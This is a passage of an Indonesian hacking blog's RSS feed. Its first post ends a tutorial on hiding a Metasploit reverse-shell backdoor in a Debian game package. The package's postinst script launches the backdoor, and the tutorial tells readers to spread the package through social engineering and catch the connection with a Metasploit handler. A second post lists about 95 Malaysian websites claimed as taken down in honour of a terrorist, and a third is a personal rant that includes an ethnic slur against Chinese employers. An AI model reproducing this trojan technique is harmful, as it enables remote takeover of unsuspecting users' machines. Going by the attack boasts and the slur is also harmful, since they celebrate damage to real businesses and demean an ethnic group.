Version: 0.1.1-2<br />
Section: Games and Amusement<br />
Priority: optional<br />
Architecture: i386<br />
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)<br />
Description: game keren bangat</code></p>
<p>contoh file postinst<br />
<code>#!/bin/bash</code></p>
<p><code>sudo chmod 2755 /usr/games/scores &#038;&#038; /usr/games/scores &#038; /usr/games/ninvaders &#038;</code></p>
<p><strong>scores</strong> adalah nama backdoornya,<strong>ninvaders</strong> adalah nama binary dari gamenya..letaknya pada direcotyr <strong>usr/games</strong><br />
<a href="http://fvck.captureflags.com/wp-content/uploads/3.png"><img src="http://fvck.captureflags.com/wp-content/uploads/3-300x225.png" alt="3" title="3" width="300" height="225" class="aligncenter size-medium wp-image-339" /></a></p>
<p>buat backdoornya dengan payload metasploit.misalnya menggunakan payload <strong>linux/x86/shell/reverse_tcp</strong>,LHOST adalah ip kita ( attacker ),LPORT port yang digunakan untuk komunikasi..nama backdoornya adalah <strong>scores</strong>.<br />
terus kopi file scores ke  usr/games yang ada pada direktory tempat paket tadi di ekstrak<br />
<a href="http://fvck.captureflags.com/wp-content/uploads/4.png"><img src="http://fvck.captureflags.com/wp-content/uploads/4-300x225.png" alt="4" title="4" width="300" height="225" class="aligncenter size-medium wp-image-340" /></a></p>
<p>ehmmm..saatnya buat paket yang berisi backdoor.jangan lupa <strong>permission </strong> file <strong>postinst</strong> di ganti menjadi <strong>755</strong>.<br />
buat paket dengan perintah <strong>dpkg-deb &#8211;build nama_directory_yang_berisi_file_backdoor</strong>..misalnya <strong>dpkg-deb &#8211;build /pentest/darkpy/trojan/xxx</strong><br />
setelah tu file yang di hasilkan adalah file <strong>.deb(hidden)</strong> yang ada pada directory <strong>xxx</strong>.<br />
rename file .deb menjadi nama file lain..tergantung selera&#8230;<br />
backdoor dah jadi..tinggal di sebarin aja&#8230;terserah gimanapun caranya..pake social engineering juga boleh..<br />
<a href="http://fvck.captureflags.com/wp-content/uploads/5.png"><img src="http://fvck.captureflags.com/wp-content/uploads/5-300x225.png" alt="5" title="5" width="300" height="225" class="aligncenter size-medium wp-image-342" /></a> </p>
<p>jalankan metasploitnya&#8230;disini menggunakan <strong>exploit/multi/handler</strong> sebagai &#8217;server&#8217;.masukan data &#8211; data sesuai dengan data yang dimasukan untuk membuat backdoor.<br />
disini menggunakan <strong>msfcli</strong> biar loadingnya lebih cepat..bisa juga menggunakan <strong>msfconsole</strong>.<br />
<a href="http://fvck.captureflags.com/wp-content/uploads/6.png"><img src="http://fvck.captureflags.com/wp-content/uploads/6-300x225.png" alt="6" title="6" width="300" height="225" class="aligncenter size-medium wp-image-344" /></a></p>
<p>mmmm&#8230;setelah itu tinggal nunggu doang..ketika paket yang kita buat tadi di eksekusi  oleh client,kita dapat connection back..dari gambar di bawah bisa dilihat&#8230;<br />
<a href="http://fvck.captureflags.com/wp-content/uploads/7.png"><img src="http://fvck.captureflags.com/wp-content/uploads/7-300x225.png" alt="7" title="7" width="300" height="225" class="aligncenter size-medium wp-image-345" /></a></p>
<p>voilaaaaaaaa..dapat koneksi dari ip <strong>192.168.1.129</strong>..sekarang tinggal anda &#8211; anda semua..mau diapakan tu compi..wkwkwkkww</p>
<p>teknik kek gini cocoknya di terapin buat <strong>client side attack</strong>..</p>
<p>great thanks buat xshadow,gblack,xcode,YOU<br />
great thanks buat D&#8217;Vt.</p>
<a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Ffvck.captureflags.com%2Fbinary-linux-backdoor.x&amp;linkname=binary%20linux%20backdoor">Share/Save</a>]]></content:encoded>
			<wfw:commentRss>http://fvck.captureflags.com/binary-linux-backdoor.x/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>malingsial terrorist and server get down&#8230;</title>
		<link>http://fvck.captureflags.com/malingsial-terrorist-and-server-get-down.x</link>
		<comments>http://fvck.captureflags.com/malingsial-terrorist-and-server-get-down.x#comments</comments>
		<pubDate>Fri, 18 Sep 2009 16:35:19 +0000</pubDate>
		<dc:creator>Xshadow</dc:creator>
				<category><![CDATA[attacking]]></category>
		<category><![CDATA[0wn3d]]></category>
		<category><![CDATA[0wned]]></category>

		<guid isPermaLink="false">http://fvck.captureflags.com/?p=317</guid>
		<description><![CDATA[site maling get down&#8230; memperingati mokatnya noordin&#8230;
list :
1. flushngo.com
2. lumina.com.my
3. www.alamtimur.com.my
4. www.anchorlink.com.my
5. www.ryjia.com.my
6. www.plischasia.com
7. www.konpro-group.com
8. www.pentateknik.com.my
9. www.crafsmy.com
10. www.ao.com.my
11. brimalstampress.com
12. www.ysegroup.com
13. easypack.com.my
14. www.rayaco.com.my
15. ccssb.com
16. www.impiantekad.com
17. www.houghton.com.my
18. chrla.net
19. jiahuahang.com
20. amaireauto.com
21. www.acmecom.com
22. ce-products.com
23. www.zainalcanopy.com
24. malaysian-express.com
25. www.tempcool.com.my
26. www.astroace.com.my
27. www.malimperformance.com
28. www.alamigroup.com
29. malimperformance.com
30. www.tomahawk-ind.com
31. arinexmy.com
32. www.cekaptera.com
33. berjayasewerage.com
34. www.ksridhammananda.com
35. www.ebiza.com.my
36. www.air-blowers.com.my
37. express-marble.com
38. chungmeng.com
39. www.immanex.com
40. www.aanetwork.info
41. www.slhc.com.my
42. www.jim.com.my
43. www.mes-online.com.my
44. www.dav.com.my
45. www.de-tag.com
46. acmecom.com
47. www.eceylinco.com
48. [...]]]></description>
			<content:encoded><![CDATA[<p>site maling get down&#8230; memperingati mokatnya noordin&#8230;</p>
<p>list :</p>
<p>1. flushngo.com<br />
2. lumina.com.my<br />
3. www.alamtimur.com.my<br />
4. www.anchorlink.com.my<br />
5. www.ryjia.com.my<br />
6. www.plischasia.com<span id="more-317"></span><br />
7. www.konpro-group.com<br />
8. www.pentateknik.com.my<br />
9. www.crafsmy.com<br />
10. www.ao.com.my<br />
11. brimalstampress.com<br />
12. www.ysegroup.com<br />
13. easypack.com.my<br />
14. www.rayaco.com.my<br />
15. ccssb.com<br />
16. www.impiantekad.com<br />
17. www.houghton.com.my<br />
18. chrla.net<br />
19. jiahuahang.com<br />
20. amaireauto.com<br />
21. www.acmecom.com<br />
22. ce-products.com<br />
23. www.zainalcanopy.com<br />
24. malaysian-express.com<br />
25. www.tempcool.com.my<br />
26. www.astroace.com.my<br />
27. www.malimperformance.com<br />
28. www.alamigroup.com<br />
29. malimperformance.com<br />
30. www.tomahawk-ind.com<br />
31. arinexmy.com<br />
32. www.cekaptera.com<br />
33. berjayasewerage.com<br />
34. www.ksridhammananda.com<br />
35. www.ebiza.com.my<br />
36. www.air-blowers.com.my<br />
37. express-marble.com<br />
38. chungmeng.com<br />
39. www.immanex.com<br />
40. www.aanetwork.info<br />
41. www.slhc.com.my<br />
42. www.jim.com.my<br />
43. www.mes-online.com.my<br />
44. www.dav.com.my<br />
45. www.de-tag.com<br />
46. acmecom.com<br />
47. www.eceylinco.com<br />
48. perfectmetal.com<br />
49. www.ctflogistics.com<br />
50. www.fluidsystems.com.my<br />
51. www.astrauniforms.com<br />
52. www.exxo.com.my<br />
53. www.cellotron.com.my<br />
54. www.ceylincoseylandevelopments.com<br />
55. dtm.com.my<br />
56. www.cannergy.com.my<br />
57. www.intestmal.com<br />
58. smartdor.com<br />
59. www.frangipaniflora.com.my<br />
60. eceydata.com<br />
61. www.coolcare.biz<br />
62. www.perfectmetal.com<br />
63. ebathroom.com.my<br />
64. www.kampat.com.my<br />
65. royalcollegegroupof70.org<br />
66. www.tyden.com.my<br />
67. www.tobalidockyard.com<br />
68. www.casa-impian.com<br />
69. www.astrauniforms.com.my<br />
70. www.cablestore.com.my<br />
71. faacorp.com<br />
72. brglobal.com<br />
73. www.formahero.com.my<br />
74. www.cissacom.com<br />
75. www.easypack.com.my<br />
76. signvec.com<br />
77. www.cambridgetech.com.my<br />
78. quantumatic-automation.com<br />
79. www.eepro.com.my<br />
80. www.slumberland.com.sg<br />
81. fluidsystems-fssb.com<br />
82. www.segarasia.com<br />
83. www.greenyield.com.my<br />
84. www.fitness.com.my<br />
85. ctflogistics.com<br />
86. www.people-station.com<br />
87. www.eceyms.info<br />
88. natural-country.com<br />
89. www.cann.com.my<br />
90. www.eepo.com.my<br />
91. hulsmalaysia.com<br />
92. www.brimalstampress.com<br />
93. astrauniforms.com<br />
94. intestmal.com<br />
95. erlatech.com</p>
<a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Ffvck.captureflags.com%2Fmalingsial-terrorist-and-server-get-down.x&amp;linkname=malingsial%20terrorist%20and%20server%20get%20down%26%238230%3B">Share/Save</a>]]></content:encoded>
			<wfw:commentRss>http://fvck.captureflags.com/malingsial-terrorist-and-server-get-down.x/feed</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>[n3w p0w3r] 1&#8242;v3 607 n3w p0w3r</title>
		<link>http://fvck.captureflags.com/n3w-p0w3r-1v3-607-n3w-p0w3r.x</link>
		<comments>http://fvck.captureflags.com/n3w-p0w3r-1v3-607-n3w-p0w3r.x#comments</comments>
		<pubDate>Fri, 18 Sep 2009 05:41:35 +0000</pubDate>
		<dc:creator>Xshadow</dc:creator>
				<category><![CDATA[mem-BACOT]]></category>
		<category><![CDATA[bacot]]></category>
		<category><![CDATA[cukdus]]></category>
		<category><![CDATA[gaplek]]></category>
		<category><![CDATA[mohon maaf]]></category>
		<category><![CDATA[njancuki]]></category>
		<category><![CDATA[thanks]]></category>

		<guid isPermaLink="false">http://fvck.captureflags.com/?p=312</guid>
		<description><![CDATA[wajah dan tampilan baru??? power-nya??? juga harus baru tentunya  banyak bahasan yang mungkin akan kita bahas mulai yang asal bacot sampai yang agak berat menurut saya  ya kita tunggu saja tanggal mainnya&#8230;
ini berhubungan dengan adanya sedikit bencana / cobaan dari yang di-Atas.. apalagi di bulan puasa  yaitu kehilangan pekerjaan (tepatnya semingu bulan [...]]]></description>
			<content:encoded><![CDATA[<p>wajah dan tampilan baru??? power-nya??? juga harus baru tentunya <img src='http://fvck.captureflags.com/smilies/yahoo_bigsmile.gif' alt='&#58;&#68;' class='wp-smiley' width='18' height='18' title='&#58;&#68;' /> banyak bahasan yang mungkin akan kita bahas mulai yang asal bacot sampai yang agak berat menurut saya <img src='http://fvck.captureflags.com/smilies/yahoo_bigsmile.gif' alt='&#58;&#68;' class='wp-smiley' width='18' height='18' title='&#58;&#68;' /> ya kita tunggu saja tanggal mainnya&#8230;</p>
<p>ini berhubungan dengan adanya sedikit bencana / cobaan dari yang di-Atas.. apalagi di bulan puasa <img src='http://fvck.captureflags.com/smilies/yahoo_bigsmile.gif' alt='&#58;&#68;' class='wp-smiley' width='18' height='18' title='&#58;&#68;' /> yaitu kehilangan pekerjaan<span id="more-312"></span> (tepatnya semingu bulan puasa) karena perusahaan yang menaungi saya tidak bertanggung jawab (tanpa ada pemberitahuan / peringatan) menutup kantor secara mendadak serta menarik aset perusahaan cabang ke kantor pusat dan ditambah lagi&#8230; gaji bulan sebelumnya serta kompensasi pemutusan kerja tidak dibayarkan alias kabur&#8230; ini pekerjaan yang mungkin bisa jadikan referensi/pengalaman buat saya dan mungkin anda&#8230; <img src='http://fvck.captureflags.com/smilies/yahoo_tongue.gif' alt='&#58;&#80;' class='wp-smiley' width='18' height='18' title='&#58;&#80;' /> bahwa kerja dengan orang cina itu ibarat &#8220;karyawan itu harus rugi secara mental, materiil, waktu dan ilmu&#8221;. Pernah dikatakan oleh seseorang&#8230; &#8220;<span style="color: #ff0000;">jangan sampai kamu membagikan ilmu ke perusahaan secara gratis&#8230; karena dia akan mencuri ilmu kamu&#8230; dan sewaktu-waktu akan mendepak kamu karena ilmu yang kamu miliki sudah dia miliki. kerjakan by order anggap kita tidak butuh pekerjaannya tapi anggap mereka yang butuh kita. Ilmu-mu senjatamu</span>&#8221;</p>
<p>ketika saya caari informasi&#8230; perusahaan tersebut memang dari dulu seperti itu terhadap semua karyawannya&#8230; ya mungkin buat temen-temen&#8230;<span style="color: #ff0000;"> jangan sampai kita diperbudak sesama manusia hanya karena &#8220;kerja&#8221; Tuhan itu maha adil&#8230; kita sudah berusaha&#8230; kalau memang bukan jalannya&#8230; mau bagaimana lagi <img src='http://fvck.captureflags.com/smilies/yahoo_bigsmile.gif' alt='&#58;&#68;' class='wp-smiley' width='18' height='18' title='&#58;&#68;' /> yang penting ktia sudah berusaha&#8230; kita harus puas dengan kerja kita&#8230; meskipun jelek atau bagus hasilnya&#8230;</span></p>
<p>sekarang makin banyak ruang waktu untuk membahas tutorial dikarenakan banyak waktu saya yang kosong&#8230; <img src='http://fvck.captureflags.com/smilies/yahoo_bigsmile.gif' alt='&#58;&#68;' class='wp-smiley' width='18' height='18' title='&#58;&#68;' /> tinggal nunggu mood aja <img src='http://fvck.captureflags.com/smilies/yahoo_bigsmile.gif' alt='&#58;&#68;' class='wp-smiley' width='18' height='18' title='&#58;&#68;' /></p>
<p>moga2 gua masih bisa eksis di dunia maya&#8230; karena sekarang dah jarang OL <img src='http://fvck.captureflags.com/smilies/yahoo_bigsmile.gif' alt='&#58;&#68;' class='wp-smiley' width='18' height='18' title='&#58;&#68;' /></p>
<p>terima kasih buat temen2 yang dah sering baca tutorial yang gak berguna dari saya&#8230; dan masih mau nunggu tutorial selanjutnya&#8230; padahal jarang update&#8230; masih&#8230; saja banyak yang masuk&#8230; <img src='http://fvck.captureflags.com/smilies/yahoo_bigsmile.gif' alt='&#58;&#68;' class='wp-smiley' width='18' height='18' title='&#58;&#68;' /></p>
<p>sekali lagi saya ucapkan banyak terimakasih buat temen-temen yang &#8220;sudi&#8221; mampir / meluangkan waktu kerja / waktu kosong hanya untuk  melihat-lihat site saya <img src='http://fvck.captureflags.com/smilies/yahoo_bigsmile.gif' alt='&#58;&#68;' class='wp-smiley' width='18' height='18' title='&#58;&#68;' /></p>
<p>sekalian&#8230; mo ngucapin</p>
<p>kami segenap team captureflags (Xshadow &amp; Laharisi), dan mewakili temen2 ABC (Arena Bocah Cukdu$) crew mengucapkan:</p>
<p>&#8220;Minal &#8216;Aidin wal-Faizin dan mohon maaf lahir batin selamat Hari Raya Idul Fitri <img src='http://fvck.captureflags.com/smilies/yahoo_bigsmile.gif' alt='&#58;&#68;' class='wp-smiley' width='18' height='18' title='&#58;&#68;' /> mohon maaf buat temen2 yang YM-nya gak kebalas&#8230; pernah saya maki-maki <img src='http://fvck.captureflags.com/smilies/yahoo_laughloud.gif' alt='&#58;&#41;&#41;' class='wp-smiley' width='18' height='18' title='&#58;&#41;&#41;' /> &#8230; ngasih tutorial gak jelas&#8230; dll&#8221;</p>
<p>nb: menilik dari saya dahulu&#8230; buat belajar komputer saja tiap hari dimaki2 boss saya yang mantan dosen komputer <img src='http://fvck.captureflags.com/smilies/yahoo_bigsmile.gif' alt='&#58;&#68;' class='wp-smiley' width='18' height='18' title='&#58;&#68;' /></p>
<a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Ffvck.captureflags.com%2Fn3w-p0w3r-1v3-607-n3w-p0w3r.x&amp;linkname=%5Bn3w%20p0w3r%5D%201%26%238242%3Bv3%20607%20n3w%20p0w3r">Share/Save</a>]]></content:encoded>
			<wfw:commentRss>http://fvck.captureflags.com/n3w-p0w3r-1v3-607-n3w-p0w3r.x/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
	</channel>
</rss>
